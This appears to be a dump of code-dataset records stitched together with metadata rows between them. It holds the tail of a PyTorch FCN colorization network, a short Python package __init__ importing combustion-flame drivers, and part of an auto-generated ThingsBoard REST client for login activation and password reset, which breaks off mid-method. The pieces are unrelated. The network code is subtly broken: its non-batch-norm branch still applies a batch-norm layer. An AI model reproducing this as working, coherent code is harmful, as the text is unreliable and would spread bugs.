h_chroma = self.upscore_chroma(h_chroma)
h_chroma = h_chroma[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
h = (h_hue, h_chroma)
elif self.bin_type == 'soft':
h = self.score_fr(h)
h = self.upscore(h)
h = h[:, :, 19:19 + x.size()[2], 19:19 + x.size()[3]].contiguous()
return h
class FCN16sColor(nn.Module):
def __init__(self, n_class=32, bin_type='one-hot', batch_norm=True):
super(FCN16sColor, self).__init__()
self.n_class = n_class
self.bin_type = bin_type
self.batch_norm = batch_norm
# conv1
self.conv1_1 = nn.Conv2d(1, 64, 3, padding=100)
self.relu1_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv1_1_bn = nn.BatchNorm2d(64)
self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
self.relu1_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv1_2_bn = nn.BatchNorm2d(64)
self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/2
# conv2
self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
self.relu2_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv2_1_bn = nn.BatchNorm2d(128)
self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
self.relu2_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv2_2_bn = nn.BatchNorm2d(128)
self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/4
# conv3
self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
self.relu3_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_1_bn = nn.BatchNorm2d(256)
self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
self.relu3_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_2_bn = nn.BatchNorm2d(256)
self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
self.relu3_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_3_bn = nn.BatchNorm2d(256)
self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/8
# conv4
self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
self.relu4_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_1_bn = nn.BatchNorm2d(512)
self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
self.relu4_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_2_bn = nn.BatchNorm2d(512)
self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
self.relu4_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_3_bn = nn.BatchNorm2d(512)
self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/16
# conv5
self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_1_bn = nn.BatchNorm2d(512)
self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_2_bn = nn.BatchNorm2d(512)
self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_3_bn = nn.BatchNorm2d(512)
self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/32
# fc6
self.fc6 = nn.Conv2d(512, 4096, 7)
self.relu6 = nn.ReLU(inplace=True)
if batch_norm:
self.fc6_bn = nn.BatchNorm2d(4096)
self.drop6 = nn.Dropout2d()
# fc7
self.fc7 = nn.Conv2d(4096, 4096, 1)
self.relu7 = nn.ReLU(inplace=True)
self.fc7_bn = nn.BatchNorm2d(4096)
self.drop7 = nn.Dropout2d()
if bin_type == 'one-hot':
# NOTE: *two* output prediction maps for hue and chroma
raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
elif bin_type == 'soft':
self.score_fr = nn.Conv2d(4096, n_class, 1)
self.score_pool4 = nn.Conv2d(512, n_class, 1)
self.upscore2 = nn.ConvTranspose2d(n_class, n_class, 4, stride=2,
bias=False)
self.upscore16 = nn.ConvTranspose2d(n_class, n_class, 32, stride=16,
bias=False)
self.upscore2.weight.requires_grad = False # fix bilinear upsamplers
self.upscore16.weight.requires_grad = False
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
pass # leave the default PyTorch init
if isinstance(m, nn.ConvTranspose2d):
assert m.kernel_size[0] == m.kernel_size[1]
initial_weight = get_upsampling_weight(
m.in_channels, m.out_channels, m.kernel_size[0])
m.weight.data.copy_(initial_weight)
def forward(self, x):
h = x
h = self.conv1_1(h)
if self.batch_norm:
h = self.conv1_1_bn(h)
h = self.relu1_1(h)
h = self.conv1_2(h)
if self.batch_norm:
h = self.conv1_2_bn(h)
h = self.relu1_2(h)
h = self.pool1(h)
if self.batch_norm:
h = self.relu2_1(self.conv2_1_bn(self.conv2_1(h)))
else:
h = self.relu2_1(self.conv2_1(h))
if self.batch_norm:
h = self.relu2_2(self.conv2_2_bn(self.conv2_2(h)))
else:
h = self.relu2_2(self.conv2_2_bn(self.conv2_2(h)))
h = self.pool2(h)
if self.batch_norm:
h = self.relu3_1(self.conv3_1_bn(self.conv3_1(h)))
else:
h = self.relu3_1(self.conv3_1(h))
if self.batch_norm:
h = self.relu3_2(self.conv3_2_bn(self.conv3_2(h)))
else:
h = self.relu3_2(self.conv3_2(h))
if self.batch_norm:
h = self.relu3_3(self.conv3_3_bn(self.conv3_3(h)))
else:
h = self.relu3_3(self.conv3_3(h))
h = self.pool3(h)
if self.batch_norm:
h = self.relu4_1(self.conv4_1_bn(self.conv4_1(h)))
else:
h = self.relu4_1(self.conv4_1(h))
if self.batch_norm:
h = self.relu4_2(self.conv4_2_bn(self.conv4_2(h)))
else:
h = self.relu4_2(self.conv4_2(h))
if self.batch_norm:
h = self.relu4_3(self.conv4_3_bn(self.conv4_3(h)))
else:
h = self.relu4_3(self.conv4_3(h))
h = self.pool4(h)
pool4 = h # 1/16
if self.batch_norm:
h = self.relu5_1(self.conv5_1_bn(self.conv5_1(h)))
else:
h = self.relu5_1(self.conv5_1(h))
if self.batch_norm:
h = self.relu5_2(self.conv5_2_bn(self.conv5_2(h)))
else:
h = self.relu5_2(self.conv5_2(h))
if self.batch_norm:
h = self.relu5_3(self.conv5_3_bn(self.conv5_3(h)))
else:
h = self.relu5_3(self.conv5_3(h))
h = self.pool5(h)
if self.batch_norm:
h = self.relu6(self.fc6_bn(self.fc6(h)))
else:
h = self.relu6(self.fc6(h))
h = self.drop6(h)
if self.batch_norm:
h = self.relu7(self.fc7_bn(self.fc7(h)))
else:
h = self.relu7(self.fc7(h))
h = self.drop7(h)
if self.bin_type == 'one-hot':
raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
elif self.bin_type == 'soft':
h = self.score_fr(h)
h = self.upscore2(h)
upscore2 = h # 1/16
h = self.score_pool4(pool4)
h = h[:, :, 5:5 + upscore2.size()[2], 5:5 + upscore2.size()[3]]
score_pool4c = h # 1/16
h = upscore2 + score_pool4c
h = self.upscore16(h)
h = h[:, :, 27:27 + x.size()[2], 27:27 + x.size()[3]].contiguous()
return h
def copy_params_from_fcn32s(self, fcn32s):
for name, l1 in fcn32s.named_children():
try:
l2 = getattr(self, name)
l2.weight # skip ReLU / Dropout
except Exception:
continue
assert l1.weight.size() == l2.weight.size()
assert l1.bias.size() == l2.bias.size()
l2.weight.data.copy_(l1.weight.data)
l2.bias.data.copy_(l1.bias.data)
class FCN8sColor(nn.Module):
def __init__(self, n_class=32, bin_type='one-hot', batch_norm=True):
super(FCN8sColor, self).__init__()
self.n_class = n_class
self.bin_type = bin_type
self.batch_norm = batch_norm
# conv1
self.conv1_1 = nn.Conv2d(1, 64, 3, padding=100)
self.relu1_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv1_1_bn = nn.BatchNorm2d(64)
self.conv1_2 = nn.Conv2d(64, 64, 3, padding=1)
self.relu1_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv1_2_bn = nn.BatchNorm2d(64)
self.pool1 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/2
# conv2
self.conv2_1 = nn.Conv2d(64, 128, 3, padding=1)
self.relu2_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv2_1_bn = nn.BatchNorm2d(128)
self.conv2_2 = nn.Conv2d(128, 128, 3, padding=1)
self.relu2_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv2_2_bn = nn.BatchNorm2d(128)
self.pool2 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/4
# conv3
self.conv3_1 = nn.Conv2d(128, 256, 3, padding=1)
self.relu3_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_1_bn = nn.BatchNorm2d(256)
self.conv3_2 = nn.Conv2d(256, 256, 3, padding=1)
self.relu3_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_2_bn = nn.BatchNorm2d(256)
self.conv3_3 = nn.Conv2d(256, 256, 3, padding=1)
self.relu3_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv3_3_bn = nn.BatchNorm2d(256)
self.pool3 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/8
# conv4
self.conv4_1 = nn.Conv2d(256, 512, 3, padding=1)
self.relu4_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_1_bn = nn.BatchNorm2d(512)
self.conv4_2 = nn.Conv2d(512, 512, 3, padding=1)
self.relu4_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_2_bn = nn.BatchNorm2d(512)
self.conv4_3 = nn.Conv2d(512, 512, 3, padding=1)
self.relu4_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv4_3_bn = nn.BatchNorm2d(512)
self.pool4 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/16
# conv5
self.conv5_1 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_1 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_1_bn = nn.BatchNorm2d(512)
self.conv5_2 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_2 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_2_bn = nn.BatchNorm2d(512)
self.conv5_3 = nn.Conv2d(512, 512, 3, padding=1)
self.relu5_3 = nn.ReLU(inplace=True)
if batch_norm:
self.conv5_3_bn = nn.BatchNorm2d(512)
self.pool5 = nn.MaxPool2d(2, stride=2, ceil_mode=True) # 1/32
# fc6
self.fc6 = nn.Conv2d(512, 4096, 7)
self.relu6 = nn.ReLU(inplace=True)
if batch_norm:
self.fc6_bn = nn.BatchNorm2d(4096)
self.drop6 = nn.Dropout2d()
# fc7
self.fc7 = nn.Conv2d(4096, 4096, 1)
self.relu7 = nn.ReLU(inplace=True)
self.fc7_bn = nn.BatchNorm2d(4096)
self.drop7 = nn.Dropout2d()
if bin_type == 'one-hot':
# NOTE: *two* output prediction maps for hue and chroma
raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
elif bin_type == 'soft':
self.score_fr = nn.Conv2d(4096, n_class, 1)
self.score_pool3 = nn.Conv2d(256, n_class, 1)
self.score_pool4 = nn.Conv2d(512, n_class, 1)
self.upscore2 = nn.ConvTranspose2d(n_class, n_class, 4, stride=2,
bias=False)
self.upscore8 = nn.ConvTranspose2d(n_class, n_class, 16, stride=8,
bias=False)
self.upscore_pool4 = nn.ConvTranspose2d(n_class, n_class, 4, stride=2,
bias=False)
self.upscore2.weight.requires_grad = False # fix bilinear upsamplers
self.upscore8.weight.requires_grad = False
self.upscore_pool4.weight.requires_grad = False
self._initialize_weights()
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
pass # leave the default PyTorch init
if isinstance(m, nn.ConvTranspose2d):
assert m.kernel_size[0] == m.kernel_size[1]
initial_weight = get_upsampling_weight(
m.in_channels, m.out_channels, m.kernel_size[0])
m.weight.data.copy_(initial_weight)
def forward(self, x):
h = x
h = self.conv1_1(h)
if self.batch_norm:
h = self.conv1_1_bn(h)
h = self.relu1_1(h)
h = self.conv1_2(h)
if self.batch_norm:
h = self.conv1_2_bn(h)
h = self.relu1_2(h)
h = self.pool1(h)
if self.batch_norm:
h = self.relu2_1(self.conv2_1_bn(self.conv2_1(h)))
else:
h = self.relu2_1(self.conv2_1(h))
if self.batch_norm:
h = self.relu2_2(self.conv2_2_bn(self.conv2_2(h)))
else:
h = self.relu2_2(self.conv2_2_bn(self.conv2_2(h)))
h = self.pool2(h)
if self.batch_norm:
h = self.relu3_1(self.conv3_1_bn(self.conv3_1(h)))
else:
h = self.relu3_1(self.conv3_1(h))
if self.batch_norm:
h = self.relu3_2(self.conv3_2_bn(self.conv3_2(h)))
else:
h = self.relu3_2(self.conv3_2(h))
if self.batch_norm:
h = self.relu3_3(self.conv3_3_bn(self.conv3_3(h)))
else:
h = self.relu3_3(self.conv3_3(h))
h = self.pool3(h)
pool3 = h # 1/8
if self.batch_norm:
h = self.relu4_1(self.conv4_1_bn(self.conv4_1(h)))
else:
h = self.relu4_1(self.conv4_1(h))
if self.batch_norm:
h = self.relu4_2(self.conv4_2_bn(self.conv4_2(h)))
else:
h = self.relu4_2(self.conv4_2(h))
if self.batch_norm:
h = self.relu4_3(self.conv4_3_bn(self.conv4_3(h)))
else:
h = self.relu4_3(self.conv4_3(h))
h = self.pool4(h)
pool4 = h # 1/16
if self.batch_norm:
h = self.relu5_1(self.conv5_1_bn(self.conv5_1(h)))
else:
h = self.relu5_1(self.conv5_1(h))
if self.batch_norm:
h = self.relu5_2(self.conv5_2_bn(self.conv5_2(h)))
else:
h = self.relu5_2(self.conv5_2(h))
if self.batch_norm:
h = self.relu5_3(self.conv5_3_bn(self.conv5_3(h)))
else:
h = self.relu5_3(self.conv5_3(h))
h = self.pool5(h)
if self.batch_norm:
h = self.relu6(self.fc6_bn(self.fc6(h)))
else:
h = self.relu6(self.fc6(h))
h = self.drop6(h)
if self.batch_norm:
h = self.relu7(self.fc7_bn(self.fc7(h)))
else:
h = self.relu7(self.fc7(h))
h = self.drop7(h)
if self.bin_type == 'one-hot':
raise NotImplementedError('TODO - FCN 16s for separate hue-chroma')
elif self.bin_type == 'soft':
h = self.score_fr(h)
h = self.upscore2(h)
upscore2 = h # 1/16
h = self.score_pool4(pool4)
h = h[:, :, 5:5 + upscore2.size()[2], 5:5 + upscore2.size()[3]]
score_pool4c = h # 1/16
h = upscore2 + score_pool4c # 1/16
h = self.upscore_pool4(h)
upscore_pool4 = h # 1/8
h = self.score_pool3(pool3)
h = h[:, :,
9:9 + upscore_pool4.size()[2],
9:9 + upscore_pool4.size()[3]]
score_pool3c = h # 1/8
h = upscore_pool4 + score_pool3c # 1/8
h = self.upscore8(h)
h = h[:, :, 31:31 + x.size()[2], 31:31 + x.size()[3]].contiguous()
return h
def copy_params_from_fcn16s(self, fcn16s):
for name, l1 in fcn16s.named_children():
try:
l2 = getattr(self, name)
l2.weight # skip ReLU / Dropout
except Exception:
continue
assert l1.weight.size() == l2.weight.size()
l2.weight.data.copy_(l1.weight.data)
if l1.bias is not None:
assert l1.bias.size() == l2.bias.size()
l2.bias.data.copy_(l1.bias.data)
| 35.652646
| 92
| 0.554004
| 3,819
| 26,276
| 3.61901
| 0.056559
| 0.046668
| 0.045149
| 0.055351
| 0.8961
| 0.887273
| 0.870704
| 0.862166
| 0.84936
| 0.84936
| 0
| 0.095903
| 0.323794
| 26,276
| 736
| 93
| 35.701087
| 0.681956
| 0.037296
| 0
| 0.874161
| 0
| 0
| 0.009478
| 0
| 0
| 0
| 0
| 0.001359
| 0.011745
| 1
| 0.026846
| false
| 0.005034
| 0.008389
| 0.003356
| 0.053691
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f4db2320d634b405af0f91c11b7434c4236a04a8
| 511
|
py
|
Python
|
ctutils/driver/__init__.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/__init__.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
ctutils/driver/__init__.py
|
Combustion-Zhen/pyutils
|
dc675f2087d531fbd0ac5477dadbb5cebb9ccf79
|
[
"MIT"
] | null | null | null |
from . import chem_uq
from .free_flame import free_flame
from .free_flame import free_flame_
from .counterflow_premixed_flame import counterflow_premixed_flame
from .counterflow_premixed_flame import counterflow_premixed_flame_
from .counterflow_premixed_extinction import counterflow_premixed_extinction
from .counterflow_premixed_extinction import counterflow_premixed_extinction_
from .counterflow_twin_flame import counterflow_twin_flame
from .counterflow_twin_extinction import counterflow_twin_extinction
| 51.1
| 77
| 0.911937
| 64
| 511
| 6.78125
| 0.15625
| 0.35023
| 0.184332
| 0.193548
| 0.74424
| 0.74424
| 0.74424
| 0.626728
| 0.626728
| 0.626728
| 0
| 0
| 0.07045
| 511
| 9
| 78
| 56.777778
| 0.913684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
521f33ca62ccf67facadd26781c7cc283a1f29c7
| 36,064
|
py
|
Python
|
tb_rest_client/api/api_ce/auth_controller_api.py
|
maksonlee/python_tb_rest_client
|
a6cd17ef4de31f68c3226b7a9835292fbac4b1fa
|
[
"Apache-2.0"
] | 1
|
2021-07-19T10:09:04.000Z
|
2021-07-19T10:09:04.000Z
|
tb_rest_client/api/api_ce/auth_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
tb_rest_client/api/api_ce/auth_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class AuthControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def activate_user_using_post(self, activate_request, **kwargs): # noqa: E501
"""activateUser # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.activate_user_using_post(activate_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param dict activate_request: activateRequest (required)
:param bool send_activation_mail: sendActivationMail
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.activate_user_using_post_with_http_info(activate_request, **kwargs) # noqa: E501
else:
(data) = self.activate_user_using_post_with_http_info(activate_request, **kwargs) # noqa: E501
return data
def activate_user_using_post_with_http_info(self, activate_request, **kwargs): # noqa: E501
"""activateUser # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.activate_user_using_post_with_http_info(activate_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param activate_request: activateRequest (required)
:param bool send_activation_mail: sendActivationMail
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['activate_request', 'send_activation_mail'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'activate_request' is set
if ('activate_request' not in params or
params['activate_request'] is None):
raise ValueError("Missing the required parameter `activate_request` when calling `activate_user_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'send_activation_mail' in params:
query_params.append(('sendActivationMail', params['send_activation_mail'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'activate_request' in params:
body_params = params['activate_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/activate{?sendActivationMail}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def change_password_using_post(self, change_password_request, **kwargs): # noqa: E501
"""changePassword # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.change_password_using_post(change_password_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str change_password_request: changePasswordRequest (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.change_password_using_post_with_http_info(change_password_request, **kwargs) # noqa: E501
else:
(data) = self.change_password_using_post_with_http_info(change_password_request, **kwargs) # noqa: E501
return data
def change_password_using_post_with_http_info(self, change_password_request, **kwargs): # noqa: E501
"""changePassword # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.change_password_using_post_with_http_info(change_password_request, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str change_password_request: changePasswordRequest (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['change_password_request'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'change_password_request' is set
if ('change_password_request' not in params or
params['change_password_request'] is None):
raise ValueError("Missing the required parameter `change_password_request` when calling `change_password_using_post`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'change_password_request' in params:
body_params = params['change_password_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/auth/changePassword', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def check_activate_token_using_get(self, activate_token, **kwargs): # noqa: E501
"""checkActivateToken # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.check_activate_token_using_get(activate_token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str activate_token: activateToken (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.check_activate_token_using_get_with_http_info(activate_token, **kwargs) # noqa: E501
else:
(data) = self.check_activate_token_using_get_with_http_info(activate_token, **kwargs) # noqa: E501
return data
def check_activate_token_using_get_with_http_info(self, activate_token, **kwargs): # noqa: E501
"""checkActivateToken # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.check_activate_token_using_get_with_http_info(activate_token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str activate_token: activateToken (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['activate_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'activate_token' is set
if ('activate_token' not in params or
params['activate_token'] is None):
raise ValueError("Missing the required parameter `activate_token` when calling `check_activate_token_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'activate_token' in params:
query_params.append(('activateToken', params['activate_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/activate{?activateToken}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def check_reset_token_using_get(self, reset_token, **kwargs): # noqa: E501
"""checkResetToken # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.check_reset_token_using_get(reset_token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str reset_token: resetToken (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.check_reset_token_using_get_with_http_info(reset_token, **kwargs) # noqa: E501
else:
(data) = self.check_reset_token_using_get_with_http_info(reset_token, **kwargs) # noqa: E501
return data
def check_reset_token_using_get_with_http_info(self, reset_token, **kwargs): # noqa: E501
"""checkResetToken # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.check_reset_token_using_get_with_http_info(reset_token, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str reset_token: resetToken (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['reset_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'reset_token' is set
if ('reset_token' not in params or
params['reset_token'] is None):
raise ValueError("Missing the required parameter `reset_token` when calling `check_reset_token_using_get`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'reset_token' in params:
query_params.append(('resetToken', params['reset_token'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/noauth/resetPassword{?resetToken}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_o_auth2_clients_using_post(self, **kwargs): # noqa: E501
"""getOAuth2Clients # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_o_auth2_clients_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[OAuth2ClientInfo]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_o_auth2_clients_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_o_auth2_clients_using_post_with_http_info(**kwargs) # noqa: E501
return data
def get_o_auth2_clients_using_post_with_http_info(self, **kwargs): # noqa: E501
"""getOAuth2Clients # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_o_auth2_clients_using_post_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: list[OAuth2ClientInfo]
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
